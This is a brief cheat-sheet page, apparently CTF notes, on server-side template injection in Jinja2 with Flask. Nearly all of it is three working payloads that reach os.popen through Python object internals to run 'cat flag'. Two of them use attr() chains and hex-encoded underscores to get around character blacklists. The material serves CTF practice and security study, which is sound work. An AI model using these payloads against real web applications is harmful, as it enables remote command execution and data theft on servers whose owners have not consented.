Skip to content

Server Side Template Injection

Python Jinja2 (with Flask)

  • Good Resource
  • Exploit by calling subprocess.Popen
    Python
    # Simple version
    {{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
    # Circumvent blacklisted special characters leveraging Jinja's attr(), pipe filtering, and hex encoding of underscores
    {{config|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}
    # Another example
    {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}